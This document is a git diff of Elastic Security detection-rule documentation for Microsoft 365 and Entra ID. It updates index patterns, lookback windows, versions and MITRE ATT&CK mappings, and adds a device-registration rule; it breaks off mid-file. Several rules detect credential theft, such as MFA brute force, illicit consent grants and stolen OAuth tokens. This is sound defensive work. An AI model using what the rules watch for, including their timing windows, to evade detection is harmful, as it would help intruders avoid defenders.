-*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Identifies when a malware filter rule has been deleted or disabled in Microsoft * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-management-group-role-assignment.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-management-group-role-assignment.asciidoc index 9dda15f5bc..cd79a6a1cb 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-management-group-role-assignment.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-management-group-role-assignment.asciidoc @@ -7,8 +7,8 @@ Identifies when a new role is assigned to a management group in Microsoft 365. A *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a new role is assigned to a management group in Microsoft 365. A *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Identifies when a new role is assigned to a management group in Microsoft 365. A * Tactic: Persistence * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -115,3 +115,7 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and ** Name: Account Manipulation ** ID: T1098 ** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-safe-attachment-rule-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-safe-attachment-rule-disabled.asciidoc index b3d0e1953a..36f642cb86 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-safe-attachment-rule-disabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-safe-attachment-rule-disabled.asciidoc @@ -7,8 +7,8 @@ Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attach *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: low @@ -16,7 +16,7 @@ Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attach *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attach * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-safe-link-policy-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-safe-link-policy-disabled.asciidoc index a731a5a038..4b38eacbf4 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-safe-link-policy-disabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-safe-link-policy-disabled.asciidoc @@ -7,8 +7,8 @@ Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link polic *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link polic *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -30,10 +30,10 @@ Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link polic * Domain: Cloud * Data Source: Microsoft 365 * Use Case: Identity and Access Audit -* Tactic: Initial Access +* Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -107,10 +107,14 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Initial Access -** ID: TA0001 -** Reference URL: https://attack.mitre.org/tactics/TA0001/ +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: -** Name: Phishing -** ID: T1566 -** Reference URL: https://attack.mitre.org/techniques/T1566/ +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-transport-rule-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-transport-rule-creation.asciidoc index 4a7b22c9cb..4c8b4c905a 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-transport-rule-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-transport-rule-creation.asciidoc @@ -7,8 +7,8 @@ Identifies a transport rule creation in Microsoft 365. As a best practice, Excha *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies a transport rule creation in Microsoft 365. As a best practice, Excha *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Identifies a transport rule creation in Microsoft 365. As a best practice, Excha * Tactic: Exfiltration * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-transport-rule-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-transport-rule-modification.asciidoc index 4983db6b45..2b989987b8 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-transport-rule-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-transport-rule-modification.asciidoc @@ -7,8 +7,8 @@ Identifies when a transport rule has been disabled or deleted in Microsoft 365. *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a transport rule has been disabled or deleted in Microsoft 365. *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -34,7 +34,7 @@ Identifies when a transport rule has been disabled or deleted in Microsoft 365. * Tactic: Exfiltration * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-illicit-consent-grant-via-registered-application.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-illicit-consent-grant-via-registered-application.asciidoc index 8c1ff3d18d..3c44010fd9 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-illicit-consent-grant-via-registered-application.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-illicit-consent-grant-via-registered-application.asciidoc @@ -7,7 +7,7 @@ Identifies an Microsoft 365 illicit consent grant request on-behalf-of a registe *Rule indices*: -* logs-o365** +* logs-o365.audit-* *Severity*: medium @@ -37,7 +37,7 @@ Identifies an Microsoft 365 illicit consent grant request on-behalf-of a registe * Tactic: Initial Access * Tactic: Credential Access -*Version*: 4 +*Version*: 5 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-inbox-forwarding-rule-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-inbox-forwarding-rule-created.asciidoc index ef95b22a5f..07eb5c7f89 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-inbox-forwarding-rule-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-inbox-forwarding-rule-created.asciidoc @@ -7,8 +7,8 @@ Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox r *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox r *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -35,7 +35,7 @@ Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox r * Tactic: Collection * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-oauth-redirect-to-device-registration-for-user-principal.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-oauth-redirect-to-device-registration-for-user-principal.asciidoc index 84f74f9253..a5f8656274 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-oauth-redirect-to-device-registration-for-user-principal.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-oauth-redirect-to-device-registration-for-user-principal.asciidoc @@ -35,7 +35,7 @@ Identifies attempts to register a new device in Microsoft Entra ID after OAuth a * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -119,3 +119,15 @@ sequence by related.user with maxspan=30m ** Name: Device Registration ** ID: T1098.005 ** Reference URL: https://attack.mitre.org/techniques/T1098/005/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-potential-ransomware-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-potential-ransomware-activity.asciidoc index 6ab2e33c33..dd783d52bc 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-potential-ransomware-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-potential-ransomware-activity.asciidoc @@ -7,8 +7,8 @@ Identifies when Microsoft Cloud App Security reports that a user has uploaded fi *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when Microsoft Cloud App Security reports that a user has uploaded fi *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Identifies when Microsoft Cloud App Security reports that a user has uploaded fi * Tactic: Impact * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-custom-application-interaction-allowed.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-custom-application-interaction-allowed.asciidoc index ca083cae14..d13cc0fc66 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-custom-application-interaction-allowed.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-custom-application-interaction-allowed.asciidoc @@ -7,8 +7,8 @@ Identifies when custom applications are allowed in Microsoft Teams. If an organi *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when custom applications are allowed in Microsoft Teams. If an organi *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -29,10 +29,10 @@ Identifies when custom applications are allowed in Microsoft Teams. If an organi * Domain: Cloud * Data Source: Microsoft 365 * Use Case: Configuration Audit -* Tactic: Persistence +* Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 210 +*Version*: 211 *Rule authors*: @@ -111,6 +111,10 @@ o365.audit.NewValue:True and event.outcome:success *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Persistence -** ID: TA0003 -** Reference URL: https://attack.mitre.org/tactics/TA0003/ +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-external-access-enabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-external-access-enabled.asciidoc index 0a689cc7af..10b2cffa3f 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-external-access-enabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-external-access-enabled.asciidoc @@ -7,8 +7,8 @@ Identifies when external access is enabled in Microsoft Teams. External access l *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when external access is enabled in Microsoft Teams. External access l *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -29,10 +29,10 @@ Identifies when external access is enabled in Microsoft Teams. External access l * Domain: Cloud * Data Source: Microsoft 365 * Use Case: Configuration Audit -* Tactic: Persistence +* Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -109,10 +109,10 @@ o365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Persistence -** ID: TA0003 -** Reference URL: https://attack.mitre.org/tactics/TA0003/ +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: -** Name: Account Manipulation -** ID: T1098 -** Reference URL: https://attack.mitre.org/techniques/T1098/ +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-guest-access-enabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-guest-access-enabled.asciidoc index 5aeb31076f..a7f1eb875d 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-guest-access-enabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-guest-access-enabled.asciidoc @@ -7,8 +7,8 @@ Identifies when guest access is enabled in Microsoft Teams. Guest access in Team *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when guest access is enabled in Microsoft Teams. Guest access in Team *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies when guest access is enabled in Microsoft Teams. Guest access in Team * Tactic: Persistence * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-unusual-volume-of-file-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-unusual-volume-of-file-deletion.asciidoc index 78f5f7ae77..dd3a8fcbeb 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-unusual-volume-of-file-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-unusual-volume-of-file-deletion.asciidoc @@ -7,8 +7,8 @@ Identifies that a user has deleted an unusually large volume of files as reporte *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies that a user has deleted an unusually large volume of files as reporte *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Identifies that a user has deleted an unusually large volume of files as reporte * Tactic: Impact * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-user-restricted-from-sending-email.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-user-restricted-from-sending-email.asciidoc index 85e8f9ad09..978c35c2d7 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-user-restricted-from-sending-email.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-user-restricted-from-sending-email.asciidoc @@ -7,8 +7,8 @@ Identifies when a user has been restricted from sending email due to exceeding s *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a user has been restricted from sending email due to exceeding s *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -30,10 +30,10 @@ Identifies when a user has been restricted from sending email due to exceeding s * Domain: Cloud * Data Source: Microsoft 365 * Use Case: Configuration Audit -* Tactic: Initial Access +* Tactic: Impact * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -107,10 +107,6 @@ event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.c *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Initial Access -** ID: TA0001 -** Reference URL: https://attack.mitre.org/tactics/TA0001/ -* Technique: -** Name: Valid Accounts -** ID: T1078 -** Reference URL: https://attack.mitre.org/techniques/T1078/ +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-concurrent-sign-ins-with-suspicious-properties.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-concurrent-sign-ins-with-suspicious-properties.asciidoc index 7f8014cc57..1e4823ef87 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-concurrent-sign-ins-with-suspicious-properties.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-concurrent-sign-ins-with-suspicious-properties.asciidoc @@ -36,7 +36,7 @@ Identifies concurrent azure signin events for the same user and from multiple so * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -92,7 +92,7 @@ This rule requires the Azure logs integration be enabled and configured to colle [source, js] ---------------------------------- -from logs-azure.signinlogs* metadata _id, _version, _index +from logs-azure.signinlogs-* metadata _id, _version, _index // Scheduled to run every hour, reviewing events from past hour | where @@ -166,3 +166,15 @@ from logs-azure.signinlogs* metadata _id, _version, _index ** Name: Steal Application Access Token ** ID: T1528 ** Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-conditional-access-policy-cap-modified.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-conditional-access-policy-cap-modified.asciidoc index 022a0709ec..5a1bf4060e 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-conditional-access-policy-cap-modified.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-conditional-access-policy-cap-modified.asciidoc @@ -8,7 +8,7 @@ Identifies a modification to a conditional access policy (CAP) in Microsoft Entr *Rule indices*: * filebeat-* -* logs-azure* +* logs-azure.auditlogs-* *Severity*: medium @@ -36,7 +36,7 @@ Identifies a modification to a conditional access policy (CAP) in Microsoft Entr * Tactic: Persistence * Resources: Investigation Guide -*Version*: 106 +*Version*: 107 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-elevated-access-to-user-access-administrator.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-elevated-access-to-user-access-administrator.asciidoc index 34f73f5704..c7cf873fe9 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-elevated-access-to-user-access-administrator.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-elevated-access-to-user-access-administrator.asciidoc @@ -10,9 +10,9 @@ Identifies when a user has elevated their access to User Access Administrator fo * filebeat-* * logs-azure.auditlogs-* -*Severity*: medium +*Severity*: high -*Risk score*: 47 +*Risk score*: 73 *Runs every*: 5m @@ -24,10 +24,12 @@ Identifies when a user has elevated their access to User Access Administrator fo * https://learn.microsoft.com/en-us/azure/role-based-access-control/elevate-access-global-admin?tabs=azure-portal%2Centra-audit-logs/ * https://permiso.io/blog/azures-apex-permissions-elevate-access-the-logs-security-teams-overlook +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ *Tags*: * Domain: Cloud +* Domain: Identity * Data Source: Azure * Data Source: Microsoft Entra ID * Data Source: Microsoft Entra ID Audit Logs @@ -35,7 +37,7 @@ Identifies when a user has elevated their access to User Access Administrator fo * Tactic: Privilege Escalation * Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -56,7 +58,7 @@ Identifies when a user has elevated their access to User Access Administrator fo *Investigating Microsoft Entra ID Elevated Access to User Access Administrator* -This rule identifies when a user elevates their permissions to the "User Access Administrator" role in Microsoft Entra ID (Azure AD). This role allows full control over access management for Azure resources and can be abused by attackers for lateral movement, persistence, or privilege escalation. Since this is a **New Terms** rule, the alert will only trigger if the user has not performed this elevation in the past 14 days, helping reduce alert fatigue. +This rule identifies when a user elevates their permissions to the "User Access Administrator" role in Azure RBAC. This role allows full control over access management for Azure resources and can be abused by attackers for lateral movement, persistence, or privilege escalation. Since this is a New Terms rule, the alert will only trigger if the user has not performed this elevation in the past 14 days, helping reduce alert fatigue. *Possible investigation steps* @@ -104,8 +106,10 @@ This rule identifies when a user elevates their permissions to the "User Access [source, js] ---------------------------------- event.dataset: azure.auditlogs - and azure.auditlogs.operation_name: "User has elevated their access to User Access Administrator for their Azure Resources" - and event.outcome: "success" + and ( + azure.auditlogs.operation_name: "User has elevated their access to User Access Administrator for their Azure Resources" or + azure.auditlogs.properties.additional_details.value: "Microsoft.Authorization/elevateAccess/action" + ) and event.outcome: "success" ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-exccessive-account-lockouts-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-exccessive-account-lockouts-detected.asciidoc index 72f6963644..e76b052262 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-exccessive-account-lockouts-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-exccessive-account-lockouts-detected.asciidoc @@ -40,7 +40,7 @@ Identifies a high count of failed Microsoft Entra ID sign-in attempts as the res * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -102,7 +102,7 @@ This rule detects a high number of sign-in failures due to account lockouts (err [source, js] ---------------------------------- -from logs-azure.signinlogs* +from logs-azure.signinlogs-* | eval Esql.time_window_date_trunc = date_trunc(30 minutes, @timestamp), diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-high-risk-sign-in.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-high-risk-sign-in.asciidoc index f22b11b551..cbb783422e 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-high-risk-sign-in.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-high-risk-sign-in.asciidoc @@ -8,7 +8,7 @@ Identifies high risk Microsoft Entra ID sign-ins by leveraging Microsoft's Ident *Rule indices*: * filebeat-* -* logs-azure.signinlogs* +* logs-azure.signinlogs-* *Severity*: high @@ -36,7 +36,7 @@ Identifies high risk Microsoft Entra ID sign-ins by leveraging Microsoft's Ident * Resources: Investigation Guide * Tactic: Initial Access -*Version*: 108 +*Version*: 109 *Rule authors*: @@ -118,3 +118,7 @@ event.dataset:azure.signinlogs and ** Name: Valid Accounts ** ID: T1078 ** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-illicit-consent-grant-via-registered-application.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-illicit-consent-grant-via-registered-application.asciidoc index 92961bc4ed..65103352f2 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-illicit-consent-grant-via-registered-application.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-illicit-consent-grant-via-registered-application.asciidoc @@ -7,7 +7,7 @@ Identifies an illicit consent grant request on-behalf-of a registered Entra ID a *Rule indices*: -* logs-azure* +* logs-azure.auditlogs-* *Severity*: medium @@ -37,7 +37,7 @@ Identifies an illicit consent grant request on-behalf-of a registered Entra ID a * Tactic: Initial Access * Tactic: Credential Access -*Version*: 217 +*Version*: 218 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-mfa-totp-brute-force-attempts.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-mfa-totp-brute-force-attempts.asciidoc index a83076a872..051143ea98 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-mfa-totp-brute-force-attempts.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-mfa-totp-brute-force-attempts.asciidoc @@ -35,7 +35,7 @@ Identifies brute force attempts against Azure Entra multi-factor authentication * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -109,7 +109,7 @@ This rule requires the Entra ID sign-in logs via the Azure integration be enable [source, js] ---------------------------------- -from logs-azure.signinlogs* metadata _id, _version, _index +from logs-azure.signinlogs-* metadata _id, _version, _index | where // filter for Entra Sign-in Logs diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-oauth-phishing-via-visual-studio-code-client.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-oauth-phishing-via-visual-studio-code-client.asciidoc index 23cb718764..4682848b7c 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-oauth-phishing-via-visual-studio-code-client.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-oauth-phishing-via-visual-studio-code-client.asciidoc @@ -16,7 +16,7 @@ Detects potentially suspicious OAuth authorization activity in Microsoft Entra I *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -35,7 +35,7 @@ Detects potentially suspicious OAuth authorization activity in Microsoft Entra I * Resources: Investigation Guide * Tactic: Initial Access -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -136,3 +136,11 @@ event.outcome: "success" and ** Name: Spearphishing Link ** ID: T1566.002 ** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-protection-alert-and-device-registration.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-protection-alert-and-device-registration.asciidoc new file mode 100644 index 0000000000..fc6a919fba --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-protection-alert-and-device-registration.asciidoc @@ -0,0 +1,132 @@ +[[microsoft-entra-id-protection-alert-and-device-registration]] +=== Microsoft Entra ID Protection Alert and Device Registration + +Identifies sequence of events where a Microsoft Entra ID protection alert is followed by an attempt to register a new device by the same user principal. This behavior may indicate an adversary using a compromised account to register a device, potentially leading to unauthorized access to resources or persistence in the environment. + +*Rule type*: eql + +*Rule indices*: + +* logs-azure.identity_protection-* +* logs-azure.auditlogs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk#investigation-framework + +*Tags*: + +* 